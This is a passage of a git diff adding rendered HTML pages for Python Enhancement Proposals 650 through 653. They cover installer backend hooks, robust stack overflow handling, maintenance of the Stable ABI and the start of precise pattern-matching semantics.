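    # One requirements file per dependency group (sketch assumption).
    filename = dependency_group or "requirements.txt"
    filepath = os.path.join(os.fsdecode(path), filename)
    if not os.path.exists(filepath):
        # Unknown group: the specification above requires an error.
        raise LookupError(f"unknown dependency group: {filename!r}")
    with open(filepath, encoding="utf-8") as f:
        # Keep only requirement lines; a real backend would also
        # resolve "-r" includes, environment markers, etc.
        return [line.strip() for line in f
                if line.strip() and not line.startswith(("#", "-"))]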
+
+

get_dependency_groups

+

Returns the dependency groups available to be installed. This allows +universal installers to enumerate all dependency groups the +installer backend is aware of:

+
def get_dependency_groups(
+    path: Union[str, bytes, PathLike[str]],
+    **kwargs
+) -> AbstractSet[str]:
+    ...
+
+
+
    +
  • path : An absolute path where the installer backend should be +invoked from (e.g. the directory where pyproject.toml is +located).
  • +
  • **kwargs : Arbitrary parameters that an installer backend may +require that are not already specified; allows for backwards +compatibility.
  • +
  • Returns: A set of known dependency groups, as strings. The empty set +represents no dependency groups.
  • +
+
+
+

update_dependencies

+

Outputs a dependency file based on the provided package list:

+
def update_dependencies(
+    path: Union[str, bytes, PathLike[str]],
+    dependency_specifiers: Iterable[str],
+    *,
+    dependency_group=None,
+    **kwargs
+) -> int:
+    ...
+
+
+
    +
  • path : An absolute path where the installer backend should be +invoked from (e.g. the directory where pyproject.toml is +located).
  • +
  • dependency_specifiers : An iterable of dependencies as +PEP 508 strings that are being updated, for example: +["requests==2.8.1", ...]. Optionally for a specific dependency +group.
  • +
  • dependency_group : The dependency group that the list of +packages is for.
  • +
  • **kwargs : Arbitrary parameters that an installer backend may +require that are not already specified; allows for backwards +compatibility.
  • +
  • Returns : An exit code (int). 0 if successful, any positive integer +if unsuccessful.
  • +
+
+
+
+
+

Example

+

Let’s consider implementing an installer backend that uses pip and +its requirements files for dependency groups. An implementation may +(very roughly) look like the following:

+
import subprocess
+import sys
+
+
+def invoke_install(path, *, dependency_group=None, **kwargs):
+    try:
+        return subprocess.run(
+            [
+                sys.executable,
+                "-m",
+                "pip",
+                "install",
+                "-r",
+                dependency_group or "requirements.txt",
+            ],
+            cwd=path,
+            check=True,  # raise CalledProcessError on a non-zero exit
+        ).returncode
+    except subprocess.CalledProcessError as e:
+        return e.returncode
+
+
+

If we named this package pep650pip, then we could specify in +pyproject.toml:

+
[install-system]
+requires = ["pep650pip", "pip"]
+install-backend = "pep650pip:main"
+
+
+
+
+

Rationale

+

All hooks take **kwargs to allow for backwards compatibility and +allow for tool specific installer backend functionality which +requires a user to provide additional information not required by the +hook.

+

While installer backends must be Python packages, what they do when +invoked is an implementation detail of that tool. For example, an +installer backend could act as a wrapper for a platform package +manager (e.g., apt).

+

The interface does not in any way try to specify how +installer backends should function. This is on purpose so that +installer backends can be allowed to innovate and solve problems in +their own way. This also means this PEP takes no stance on OS +packaging as that would be an installer backend’s domain.

+

Defining the API in Python does mean that some Python code will +eventually need to be executed. That does not preclude non-Python +installer backends from being used, though (e.g. mamba), as they +could be executed as a subprocess from Python code.

+
+
+

Backwards Compatibility

+

This PEP would have no impact on pre-existing code and functionality +as it only adds new functionality to a universal installer. Any +existing installer should maintain its existing functionality and use +cases, therefore having no backwards compatibility issues. Only code +aiming to take advantage of this new functionality will have +motivation to make changes to its pre-existing code.

+
+
+

Security Implications

+

A malicious user has no increased ability or easier access to anything +with the addition of standardized installer specifications. The +installer that could be invoked by a universal installer via the +interface specified in this PEP would be explicitly declared by the +user. If the user has chosen a malicious installer, then invoking it +with a universal installer is no different than the user invoking +the installer directly. A malicious installer being an +installer backend doesn’t give it additional permissions or +abilities.

+
+
+

Rejected Ideas

+
+

A standardized lock file

+

A standardized lock file would solve a lot of the same problems that +specifying installer requirements would. For example, it would allow +for PaaS/IaaS to just support one installer that could read the +standardized lock file regardless of the installer that created it. +The problem with a standardized lock file is the difference in needs +between Python package installers as well as a fundamental issue with +creating reproducible environments via the lockfile (one of the main +benefits).

+

Needs and information stored in dependency files between installers +differ significantly and are dependent on installer functionality. For +example, a Python package installer such as Poetry requires +information for all Python versions and platforms and calculates +appropriate hashes while pip doesn’t. Additionally, pip would not be +able to guarantee recreating the same environment (install the exact +same dependencies) as it is outside the scope of its functionality. +This makes a standardized lock file harder to implement and makes it +seem more appropriate to make lock files tool specific.

+
+
+

Have installer backends support creating virtual environments

+

Because installer backends will very likely have a concept of virtual +environments and how to install into them, it was briefly considered +to have them also support creating virtual environments. In the end, +though, it was considered an orthogonal idea.

+
+
+
+

Open Issues

+
+

Should the dependency_group argument take an iterable?

+

This would allow for specifying non-overlapping dependency groups in +a single call, e.g. “docs” and “test” groups which have independent +dependencies but which a developer may want to install simultaneously +while doing development.

+
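
For comparison, a hypothetical variant of the signature under this
idea might look like:

def invoke_install(path, *, dependency_groups=(), **kwargs) -> int:
    ...  # install the union of the named groups

# e.g. invoke_install(".", dependency_groups=("docs", "test"))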
+
+

Is the installer backend executed in-process?

+

If the installer backend is executed in-process then it greatly +simplifies knowing what environment to install for/into, as the live +Python environment can be queried for appropriate information.

+

Executing out-of-process allows for minimizing potential issues of +clashes between the environment being installed into and the +installer backend (and potentially universal installer).

+
+
+

Enforce that results from the proposed interface feed into other parts?

+

E.g. the results from get_dependencies_to_install() and +get_dependency_groups() can be passed into invoke_install(). +This would prevent drift between the results of various parts of the +proposed interface, but it makes more of the interface required +instead of optional.

+
+
+

Raising exceptions instead of exit codes for failure conditions

+

It has been suggested that instead of returning an exit code the API +should raise exceptions. If you view this PEP as helping to translate +current installers into installer backends, then relying on exit +codes makes sense. There is also the point that the APIs have no +specific return value, so passing along an exit code does not +interfere with what the functions return.

+

Compare that to raising exceptions in case of an error. That could +potentially provide a more structured approach to error raising, +although to be able to capture errors it would require specifying +exception types as part of the interface.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0650.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0651/index.html b/pep-0651/index.html new file mode 100644 index 00000000000..7c30cdcfaba --- /dev/null +++ b/pep-0651/index.html @@ -0,0 +1,357 @@ +PEP 651 – Robust Stack Overflow Handling | peps.python.org
+
+

+
+
+

PEP 651 – Robust Stack Overflow Handling

+
+
Author:
+
Mark Shannon <mark at hotpy.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
18-Jan-2021
+
Post-History:
+
19-Jan-2021
+
+
+
+
+
+

Rejection Notice

+

This PEP has been rejected by the Python Steering Council.

+
+
+

Abstract

+

This PEP proposes that Python should treat machine stack overflow differently from runaway recursion.

+

This would allow programs to set the maximum recursion depth to fit their needs +and provide additional safety guarantees.

+

If this PEP is accepted, then the following program will run safely to completion:

+
sys.setrecursionlimit(1_000_000)
+
+def f(n):
+    if n:
+        f(n-1)
+
+f(500_000)
+
+
+

and the following program will raise a StackOverflow, without causing a VM crash:

+
sys.setrecursionlimit(1_000_000)
+
+class X:
+    def __add__(self, other):
+        return self + other
+
+X() + 1
+
+
+
+
+

Motivation

+

CPython uses a single recursion depth counter to prevent both runaway recursion and C stack overflow. +However, runaway recursion and machine stack overflow are two different things. +Allowing machine stack overflow is a potential security vulnerability, but limiting recursion depth can prevent the +use of some algorithms in Python.

+

Currently, if a program needs to deeply recurse it must manage the maximum recursion depth allowed, +hopefully managing to set it in the region between the minimum needed to run correctly and the maximum that is safe +to avoid a memory protection error.

+

By separating the checks for C stack overflow from checks for recursion depth, +pure Python programs can run safely, using whatever level of recursion they require.

+
+
+

Rationale

+

CPython currently relies on a single limit to guard against potentially dangerous stack overflow +in the virtual machine and to guard against runaway recursion in the Python program.

+

This is a consequence of the implementation which couples the C and Python call stacks. +By breaking this coupling, we can improve both the usability of CPython and its safety.

+

The recursion limit exists to protect against runaway recursion; the integrity of the virtual machine should not depend on it. +Similarly, recursion should not be limited by implementation details.

+
+
+

Specification

+

Two new exception classes will be added, StackOverflow and RecursionOverflow, both of which will be +sub-classes of RecursionError.

+
+

StackOverflow exception

+

A StackOverflow exception will be raised whenever the interpreter or builtin module code +determines that the C stack is at or nearing a limit of safety. +StackOverflow is a sub-class of RecursionError, +so any code that handles RecursionError will handle StackOverflow.

+
+
+

RecursionOverflow exception

+

A RecursionOverflow exception will be raised when a call to a Python function +causes the recursion limit to be exceeded. +This is a slight change from current behavior which raises a RecursionError. +RecursionOverflow is a sub-class of RecursionError, +so any code that handles RecursionError will continue to work as before.

+
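
A sketch of the intended compatibility (StackOverflow and
RecursionOverflow are the names proposed here and do not exist in
released CPython; the handler below runs unchanged either way):

def deep(n):
    if n:
        deep(n - 1)

try:
    deep(10**9)
except RecursionError as err:
    # Under this PEP this handler also catches RecursionOverflow
    # (and StackOverflow), since both subclass RecursionError.
    print("caught", type(err).__name__)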
+
+

Decoupling the Python stack from the C stack

+

In order to provide the above guarantees and ensure that any program that worked previously +continues to do so, the Python and C stacks will need to be separated. +That is, calls to Python functions from Python functions should not consume space on the C stack. +Calls to and from builtin functions will continue to consume space on the C stack.

+

The size of the C stack will be implementation defined, and may vary from machine to machine. +It may even differ between threads. However, there is an expectation that any code that could run +with the recursion limit set to the previous default value, will continue to run.

+

Many operations in Python perform some sort of call at the C level. +Most of these will continue to consume C stack, and will result in a +StackOverflow exception if uncontrolled recursion occurs.

+
+
+

Other Implementations

+

Other implementations are required to fail safely regardless of what value the recursion limit is set to.

+

If the implementation couples the Python stack to the underlying VM or hardware stack, +then it should raise a RecursionOverflow exception when the recursion limit is exceeded, +but the underlying stack does not overflow. +If the underlying stack overflows, or is near to overflow, +then a StackOverflow exception should be raised.

+
+
+

C-API

+

A new function, Py_CheckStackDepth() will be added, and the behavior of Py_EnterRecursiveCall() will be modified slightly.

+
+

Py_CheckStackDepth()

+

int Py_CheckStackDepth(const char *where) +will return 0 if there is no immediate danger of C stack overflow. +It will return -1 and set an exception, if the C stack is near to overflowing. +The where parameter is used in the exception message, in the same fashion +as the where parameter of Py_EnterRecursiveCall().

+
+
+

Py_EnterRecursiveCall()

+

Py_EnterRecursiveCall() will be modified to call Py_CheckStackDepth() before performing its current function.

+
+
+

Py_LeaveRecursiveCall()

+

Py_LeaveRecursiveCall() will remain unchanged.

+
+
+
+
+

Backwards Compatibility

+

This feature is fully backwards compatible at the Python level. +Some low-level tools, such as machine-code debuggers, will need to be modified. +For example, the gdb scripts for Python will need to be aware that there may be more than one Python frame +per C frame.

+

C code that uses the Py_EnterRecursiveCall(), PyLeaveRecursiveCall() pair of +functions will continue to work correctly. In addition, Py_EnterRecursiveCall() +may raise a StackOverflow exception.

+

New code should use the Py_CheckStackDepth() function, unless the code wants to +count as a Python function call with regard to the recursion limit.

+

We recommend that “python-like” code, such as Cython-generated functions, +use Py_EnterRecursiveCall(), but other code use Py_CheckStackDepth().

+
+
+

Security Implications

+

It will no longer be possible to crash the CPython virtual machine through recursion.

+
+
+

Performance Impact

+

It is unlikely that the performance impact will be significant.

+

The additional logic required will probably have a very small negative impact on performance. +The improved locality of reference from reduced C stack use should have some small positive impact.

+

It is hard to predict whether the overall effect will be positive or negative, +but it is quite likely that the net effect will be too small to be measured.

+
+
+

Implementation

+
+

Monitoring C stack consumption

+

Gauging whether a C stack overflow is imminent is difficult, so we need to be conservative. +We need to determine safe bounds for the stack, which is not possible in portable C code.

+

For major platforms, platform-specific APIs will be used to provide accurate stack bounds. +However, for minor platforms some amount of guessing may be required. +While this might sound bad, it is no worse than the current situation, where we guess that the +size of the C stack is at least 1000 times the stack space required for the chain of calls from +_PyEval_EvalFrameDefault to _PyEval_EvalFrameDefault.

+

This means that in some cases the amount of recursion possible may be reduced. +In general, however, the amount of recursion possible should be increased, as many calls will use no C stack.

+

Our general approach to determining a limit for the C stack is to get an address within the current C frame, +as early as possible in the call chain. The limit can then be guessed by adding some constant to that.

+
+
+

Making Python-to-Python calls without consuming the C stack

+

Calls in the interpreter are handled by the CALL_FUNCTION, +CALL_FUNCTION_KW, CALL_FUNCTION_EX and CALL_METHOD instructions. +The code for those instructions will be modified so that when +a Python function or method is called, instead of making a call in C, +the interpreter will set up the callee’s frame and continue interpretation as normal.

+

The RETURN_VALUE instruction will perform the reverse operation, +except when the current frame is the entry frame of the interpreter +when it will return as normal.

+
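
The effect of this decoupling can be illustrated at the Python level
with a trampoline, in which logical call depth no longer consumes
host-stack space; this is only an analogy for the interpreter-level
change, not its implementation:

def trampoline(thunk):
    # Run continuations iteratively: constant host-stack depth,
    # unbounded logical call depth.
    while callable(thunk):
        thunk = thunk()
    return thunk

def countdown(n):
    if n == 0:
        return "done"
    return lambda: countdown(n - 1)  # a continuation, not a direct call

print(trampoline(lambda: countdown(1_000_000)))  # prints "done"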
+
+
+

Rejected Ideas

+

None, as yet.

+
+
+

Open Issues

+

None, as yet.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0651.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0652/index.html b/pep-0652/index.html new file mode 100644 index 00000000000..869768ef3e1 --- /dev/null +++ b/pep-0652/index.html @@ -0,0 +1,554 @@ +PEP 652 – Maintaining the Stable ABI | peps.python.org
+
+

+
+
+

PEP 652 – Maintaining the Stable ABI

+
+
Author:
+
Petr Viktorin <encukou at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
09-Feb-2021
+
Python-Version:
+
3.10
+
Resolution:
+
Python-Dev message
+
+
+
+
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at C API Stability (user docs) and +Changing Python’s C API (development docs).

+


+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

CPython’s Limited C-API and Stable ABI, introduced in PEP 384, +will be formalized in a single definitive file, tested, and documented.

+
+
+

Motivation

+

PEP 384 defined a Limited API and Stable ABI, which allow extenders and +embedders of CPython to compile extension modules that are binary-compatible +with any subsequent version of 3.x. +In theory, this brings several advantages:

+
    +
  • A module can be built only once per platform and support multiple versions +of Python, reducing time, power and maintainer attention needed for builds +(in exchange for potentially worse performance).
  • +
  • Binary wheels using the Stable ABI work with new versions of CPython +throughout the pre-release period, and can be tested in environments where +building from source is not practical.
  • +
  • As a welcome side effect of the Limited API’s hiding of implementation +details, this API is becoming a viable target for alternate Python +implementations that would be incompatible with the full C API.
  • +
+

However, in hindsight, PEP 384 and its implementation have several issues:

+
    +
  • It is ill-defined. According to PEP 384, functions are opt-out: +all functions not specially marked are part of the Stable ABI. +In practice, for Windows there’s a list that’s opt-in. +For users there is a #define that should make only the Stable ABI +available, but there is no process that ensures it is kept up to date. +Neither is there a process for updating the documentation.
  • +
  • Until recently, the Stable ABI was not tested at all. It tends to break. +For example, changing a function to a macro can break the Stable ABI as the +function symbol is removed.
  • +
  • There is no way to deprecate parts of the Limited API.
  • +
  • It is incomplete. Some operations are not available in the Stable ABI, +with little reason except “we forgot”. +(This last point is one the PEP will not help with, however.)
  • +
+

This PEP defines the Limited API more clearly and introduces a process +designed to make the Stable ABI and Limited API more useful and robust.

+
+
+

Rationale

+

This PEP contains a lot of clarifications and definitions, but just one big +technical change: the Stable ABI will be explicitly listed in +a human-maintained “manifest” file.

+

There have been efforts to collect such lists automatically, e.g. by scanning +the symbols exported from Python. +Such automation might seem easier to maintain than a handcrafted file, +but has major issues: for example, the set of exported symbols has +platform-specific variations. +Also, the cost of updating an explicit manifest is small compared +to the overall work that should go into changing API that will need to +be supported forever (or until Python 3 reaches end of life, if that +comes sooner).

+

This PEP proposes automatically generating things from the manifest: +initially documentation and DLL contents, with later possibilities +for also automating tests.

+
+
+

Stable ABI vs. Limited API

+

PEP 384 and this document deal with the Limited API and the Stable ABI, +two related but distinct concepts. In short:

+
    +
  • The Stable ABI is a promise that certain extensions compiled with +CPython 3.x will be binary compatible with all subsequent versions +of CPython 3.x.
  • +
  • The Limited API is a subset of CPython’s C API that produces such extensions.
  • +
+

This section clarifies these terms and defines some of their semantics +(either pre-existing or newly proposed here).

+

The word “Extensions” is used as a shorthand for all code that uses the +Python API, e.g. extension modules or software that embeds Python.

+
+

Stable ABI

+

The CPython Stable ABI is a promise that extensions built against +a specific Stable ABI version will be compatible with any newer +interpreter of the same major version.

+

The Stable ABI does not define a complete binary interface: +important details like the layout of structures in memory or function +calling conventions are determined by the platform and the compiler and +its settings. +The Stable ABI promise only applies if these lower-level details are also stable.

+

For example, an extension built with the CPython 3.10 Stable ABI will be usable +with CPython 3.11, 3.12, etc. +It will not necessarily be compatible with CPython 4.0, nor with CPython 3.10 +on a different platform.

+

The Stable ABI is not generally forward-compatible: an extension built and +tested with CPython 3.10 will not generally be compatible with CPython 3.9.

+
+

Note

+

For example, starting in Python 3.10, the Py_tp_doc slot may be set to +NULL, while in older versions, a NULL value will likely crash the +interpreter.

+
+

The Stable ABI trades performance for its stability. +For example, extensions built for a specific CPython version will automatically +use faster macros instead of functions in the Stable ABI.

+

Future Python versions may deprecate some members of the Stable ABI. +Deprecated members will still work, but may suffer from issues like reduced +performance or, in the most extreme cases, memory/resource leaks.

+
+
+

Limited API

+

The Stable ABI promise holds for extensions compiled from code that restricts +itself to the Limited API (application programming interface). +The Limited API is a subset of CPython’s C API.

+

Extensions that target the Limited API should define the preprocessor macro +Py_LIMITED_API to either 3 or the current PYTHON_API_VERSION. +This will enable Stable ABI versions of several functions and limit definitions +to the Limited API. +(However, note that the macro is not perfect: due to technical issues or +oversights, some non-limited API might be exposed even with it defined.)

+
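
For example, with setuptools an extension might target the 3.10
Limited API as follows (a sketch; the project and file names are
placeholders, and tagging the built wheel as abi3 may additionally
involve bdist_wheel's --py-limited-api option):

# setup.py (sketch)
from setuptools import Extension, setup

setup(
    name="spam",
    ext_modules=[
        Extension(
            "spam",
            sources=["spammodule.c"],
            # Restrict compilation to the 3.10 Limited API ...
            define_macros=[("Py_LIMITED_API", "0x030A0000")],
            # ... and use the version-agnostic .abi3 module suffix.
            py_limited_api=True,
        )
    ],
)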

The Limited API is not guaranteed to be stable. +In the future, parts of the Limited API may be deprecated. +They may even be removed, as long as the Stable ABI is kept +stable and Python’s general backwards compatibility policy, PEP 387, +is followed.

+
+

Note

+

For example, a function declaration might be removed from public header +files but kept in the library. +This is currently a possibility for the future; this PEP does not propose +a concrete process for deprecations and removals.

+
+

The goal for the Limited API is to cover everything needed to interact +with the interpreter. +The main reason to not include a public API in the Limited subset +should be that it needs implementation details that change between CPython +versions (like struct memory layouts) – usually for performance reasons.

+

The Limited API is not limited to CPython. Other implementations are +encouraged to implement it and help drive its design.

+
+
+
+

Specification

+

To make the Stable ABI more useful and robust, the following changes +are proposed.

+
+

Stable ABI Manifest

+

All members of the Stable ABI – functions, typedefs, structs, data, macros, +and constants – will be explicitly listed in a single “manifest” file, +Misc/stable_abi.txt.

+

For structs, any fields that users of the Stable ABI are allowed to access +will be listed explicitly.

+

The manifest will also serve as the definitive list of the Limited API. +Members that are not part of the Limited API, but are part of the Stable ABI +(e.g. PyObject.ob_type, which is accessible by the Py_TYPE macro), +will be annotated as such.

+

For items that are only available on some systems, the manifest will record the +feature macro that determines their presence (such as MS_WINDOWS or +HAVE_FORK). +To make the implementation (and usage from non-C languages) easier, +all such macros will be simple names. +If a future item needs a “negative” macro or complex expression (such as a +hypothetical #ifndef MACOSX or #if defined(POSIX) && !defined(LINUX)), +a new feature macro will be derived.

+

The format of the manifest will be subject to change whenever needed. +It should be consumed only by scripts in the CPython repository. +If a stable list is needed, a script can be added to generate it.

+

The following will be generated from the ABI manifest:

+
    +
  • Source for the Windows shared library, PC/python3dll.c.
  • +
  • Input for documentation (see below).
  • +
  • Test case that checks the runtime availability of symbols (see below).
  • +
+

The following will be checked against the Stable ABI manifest as part of +continuous integration:

+
    +
  • The reference count summary, Doc/data/refcounts.txt, includes all +functions in the Stable ABI (among others).
  • +
  • The functions/structs declared and constants/macros defined +when Python.h is included with Py_LIMITED_API set. +(Initially Linux only; checks on other systems may be added in the future.)
  • +
+

After the initial implementation, details such as function arguments will be +added and the manifest will be checked for internal consistency (e.g. all +types used in function signatures are part of the API).

+
+
+

Contents of the Stable ABI

+

The initial Stable ABI manifest will include:

+
    +
  • The Stable ABI specified in PEP 384.
  • +
  • Everything listed in PC/python3dll.c.
  • +
  • All structs (struct typedefs) which these functions return or take as +arguments. (Fields of such structs will not necessarily be added.)
  • +
  • New type slots, such as Py_am_aiter.
  • +
  • The type flags Py_TPFLAGS_DEFAULT, Py_TPFLAGS_BASETYPE, +Py_TPFLAGS_HAVE_GC, Py_TPFLAGS_METHOD_DESCRIPTOR.
  • +
  • The calling conventions METH_* (except deprecated ones).
  • +
  • All API needed by macros in the Stable ABI (annotated as not being part of +the Limited API).
  • +
+

Items that are no longer in CPython when this PEP is accepted will be removed +from the list.

+

Additional items may be added to the initial manifest according to +the checklist below.

+
+
+

Documenting the Limited API

+

Notes saying “Part of the Limited API” will be added to Python’s documentation +automatically, in a way similar to the notes on functions that return borrowed +references.

+

A complete list of all members of the Limited API will also be added to +the documentation.

+
+
+

Testing the Stable ABI

+

An automatically generated test module will be added to ensure that all symbols +included in the Stable ABI are available at compile time.

+
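
In a similar spirit, runtime availability of symbols can be probed
from Python on POSIX systems; the symbol names below are illustrative
stand-ins for manifest entries, not the generated test itself:

import ctypes

SYMBOLS = ["PyObject_Repr", "PyLong_FromLong"]  # e.g. from the manifest

interp = ctypes.PyDLL(None)  # symbols of the running interpreter (POSIX)
for name in SYMBOLS:
    getattr(interp, name)    # raises AttributeError if a symbol is missing
print("all symbols present")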
+
+

Changing the Limited API

+

A checklist for changing the Limited API, including adding new items to it +and removing existing ones, will be added to the Devguide. +The checklist will 1) mention best practices and common pitfalls in Python +C API design and 2) guide the developer around the files that need changing and +scripts that need running when the Limited API is changed.

+

Below is the initial proposal for the checklist. +(After the PEP is accepted, see the Devguide for the current version.)

+

Note that the checklist applies to new changes; several items +in the existing Limited API are grandfathered and couldn’t be added today.

+

Design considerations:

+
    +
  • Make sure the change does not break the Stable ABI of any version of Python +since 3.5.
  • +
  • Make sure no exposed names are private (i.e. begin with an underscore).
  • +
  • Make sure the new API is well documented.
  • +
  • Make sure the types of all parameters and return values of the added +function(s) and all fields of the added struct(s) are part of the +Limited API (or standard C).
  • +
  • Make sure the new API and its intended use follows standard C, not just +features of currently supported platforms. +Specifically, follow the C dialect specified in PEP 7.
      +
    • Do not cast a function pointer to void* (a data pointer) or vice versa.
    • +
    +
  • +
  • Make sure the new API follows reference counting conventions. (Following them +makes the API easier to reason about, and easier use in other Python +implementations.)
      +
    • Do not return borrowed references from functions.
    • +
    • Do not steal references to function arguments.
    • +
    +
  • +
  • Make sure the ownership rules and lifetimes of all applicable struct fields, +arguments and return values are well defined.
  • +
  • Think about ease of use for the user. (In C, ease of use itself is not very +important; what is useful is reducing boilerplate code needed to use the +API. Bugs like to hide in boilerplate.)
      +
    • If a function will be often called with specific value for an argument, +consider making it default (used when NULL is passed in).
    • +
    +
  • +
  • Think about future extensions: for example, if it’s possible that future +Python versions will need to add a new field to your struct, +how will that be done?
  • +
  • Make as few assumptions as possible about details that might change in +future CPython versions or differ across C API implementations:
    +
      +
    • The GIL
    • +
    • Garbage collection
    • +
    • Memory layout of PyObject, lists/tuples and other structures
    • +
    +
    +
  • +
+

If following these guidelines would hurt performance, add a fast function +(or macro) to the non-limited API and a stable equivalent to the Limited API.

+

If anything is unclear, or you have a good reason to break the guidelines, +consider discussing the change at the capi-sig mailing list.

+

Procedure:

+
    +
  • Move the declaration to a header file directly under Include/, into a +#if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 >= 0x03yy0000 block +(with the yy corresponding to the target CPython version).
  • +
  • Make an entry in the Stable ABI manifest, Misc/stable_abi.txt.
  • +
  • Regenerate the autogenerated files using make regen-all. +(or the alternative for non-make platforms)
  • +
  • Build Python and run checks using make check-abi. +(or the alternative for non-make platforms)
  • +
+
+
+

Advice for Extenders and Embedders

+

The following notes will be added to documentation, along with better +information regarding this topic and what guarantees we offer:

+

Extension authors should test with all Python versions they support, +and preferably build with the lowest such version.

+

Compiling with Py_LIMITED_API defined is not a guarantee that your code +conforms to the Limited API or the Stable ABI. +Py_LIMITED_API only covers definitions, but an API also includes other +issues, such as expected semantics.

+

Examples of issues that Py_LIMITED_API does not guard against are:

+
    +
  • Calling a function with invalid arguments
  • +
  • A function that started accepting NULL values for an argument +in Python 3.9 will fail if NULL is passed to it under Python 3.8. +Only testing with 3.8 (or lower versions) will uncover this issue.
  • +
  • Some structs include a few fields that are part of the Stable ABI and other +fields that aren’t. +Py_LIMITED_API does not filter out such “private” fields.
  • +
  • Code that uses something that is not documented as part of the Stable ABI, +but exposed even with Py_LIMITED_API defined, may break in the future. +Despite the team’s best efforts, such issues may happen.
  • +
+
+
+

Note for Redistributors of Python

+

The Stable ABI promise relies on stable underlying ABI details, such as the +layout of structures in memory and function calling conventions, which +are affected by the compiler and its settings. +For the promise to hold, these details must not change between CPython 3.x +releases on a particular platform.

+
+
+
+

Backwards Compatibility

+

Backwards compatibility is one honking great idea!

+

This PEP aims at full compatibility with the existing Stable ABI and Limited +API, but defines these terms more explicitly. +It might not be consistent with some interpretations of what the existing +Stable ABI/Limited API is.

+
+
+

Security Implications

+

None known.

+
+
+

How to Teach This

+

Technical documentation will be provided in Doc/c-api/stable +and linked from the What’s New document. +Docs for CPython core developers will be added to the devguide.

+
+
+

Reference Implementation

+

See issue 43795.

+
+
+

Ideas for the Future

+

The following issues are out of scope of this PEP, but show possible +future directions.

+
+

Defining a process for deprecations/removals

+

While this PEP acknowledges that parts of the Limited API might be deprecated +or removed in the future, a process to do this is not in scope, and is left +to a possible future PEP.

+
+
+

C syntax for the ABI manifest

+

It might be useful to have the ABI manifest be a C header file, or to +generate header files from the manifest. +Either is an option for the future.

+
+
+
+

Open Issues

+

None so far.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0652.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0653/index.html b/pep-0653/index.html new file mode 100644 index 00000000000..66397d29ec5 --- /dev/null +++ b/pep-0653/index.html @@ -0,0 +1,1045 @@ +PEP 653 – Precise Semantics for Pattern Matching | peps.python.org
+
+

+
+
+

PEP 653 – Precise Semantics for Pattern Matching

+
+
Author:
+
Mark Shannon <mark at hotpy.org>
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Created:
+
09-Feb-2021
+
Post-History:
+
18-Feb-2021
+
+
+
+
+
+

Abstract

+

This PEP proposes a semantics for pattern matching that respects the general concept of PEP 634, +but is more precise, easier to reason about, and should be faster.

+

The object model will be extended with two special (dunder) attributes, __match_container__ and +__match_class__, in addition to the __match_args__ attribute from PEP 634, to support pattern matching. +Both of these new attributes must be integers and __match_args__ is required to be a tuple of unique strings.

+

With this PEP:

+
    +
  • The semantics of pattern matching will be clearer, so that patterns are easier to reason about.
  • +
  • It will be possible to implement pattern matching in a more efficient fashion.
  • +
  • Pattern matching will be more usable for complex classes, by allowing classes some more control over which patterns they match.
  • +
+
+
+

Motivation

+

Pattern matching in Python, as described in PEP 634, is to be added to Python 3.10. +Unfortunately, PEP 634 is not as precise about the semantics as it could be, +nor does it allow classes sufficient control over how they match patterns.

+
+

Precise semantics

+

PEP 634 explicitly includes a section on undefined behavior. +Large amounts of undefined behavior may be acceptable in a language like C, +but in Python it should be kept to a minimum. +Pattern matching in Python can be defined more precisely without losing expressiveness or performance.

+
+
+

Improved control over class matching

+

PEP 634 delegates the decision over whether a class is a sequence or mapping to collections.abc. +Not all classes that could be considered sequences are registered as subclasses of collections.abc.Sequence. +This PEP allows them to match sequence patterns, without the full collections.abc.Sequence machinery.

+

PEP 634 privileges some builtin classes with a special form of matching, the “self” match. +For example the pattern list(x) matches a list and assigns the list to x. +By allowing classes to choose which kinds of pattern they match, other classes can use this form as well.

+

For example, using sympy, we might want to write:

+
# a*a == a**2
+case Mul(args=[Symbol(a), Symbol(b)]) if a == b:
+    return Pow(a, 2)
+
+
+

Which requires the sympy class Symbol to “self” match. +For sympy to support this pattern with PEP 634 is possible, but a bit tricky. +With this PEP it can be implemented very easily [1].

+
+
+

Robustness

+

With this PEP, access to attributes during pattern matching becomes well defined and deterministic. +This makes pattern matching less error prone when matching objects with hidden side effects, such as object-relational mappers. +Objects will have more control over their own deconstruction, which can help prevent unintended consequences should attribute access have side-effects.

+

PEP 634 relies on the collections.abc module when determining which patterns a value can match, implicitly importing it if necessary. +This PEP will eliminate surprising import errors and misleading audit events from those imports.

+
+
+

Efficient implementation

+

The semantics proposed in this PEP will allow efficient implementation, partly as a result of having precise semantics +and partly from using the object model.

+

With precise semantics, it is possible to reason about what code transformations are correct, +and thus apply optimizations effectively.

+

Because the object model is a core part of Python, implementations already handle special attribute lookup efficiently. +Looking up a special attribute is much faster than performing a subclass test on an abstract base class.

+
+
+
+

Rationale

+

The object model and special methods are at the core of the Python language. Consequently, +implementations support them well. +Using special attributes for pattern matching allows pattern matching to be implemented in a way that +integrates well with the rest of the implementation, and is thus easier to maintain and is likely to perform better.

+

A match statement performs a sequence of pattern matches. In general, matching a pattern has three parts:

+
    +
  1. Can the value match this kind of pattern?
  2. When deconstructed, does the value match this particular pattern?
  3. Is the guard true?
+

To determine whether a value can match a particular kind of pattern, we add the __match_container__ +and __match_class__ attributes. +This allows the kind of a value to be determined in an efficient fashion.

+
+
+

Specification

+
+

Additions to the object model

+

The __match_container__ and __match_class__ attributes will be added to object. +__match_container__ should be overridden by classes that want to match mapping or sequence patterns. +__match_class__ should be overridden by classes that want to change the default behavior when matching class patterns.

+

__match_container__ must be an integer and should be exactly one of these:

+
0
+MATCH_SEQUENCE = 1
+MATCH_MAPPING = 2
+
+
+

MATCH_SEQUENCE is used to indicate that instances of the class can match sequence patterns.

+

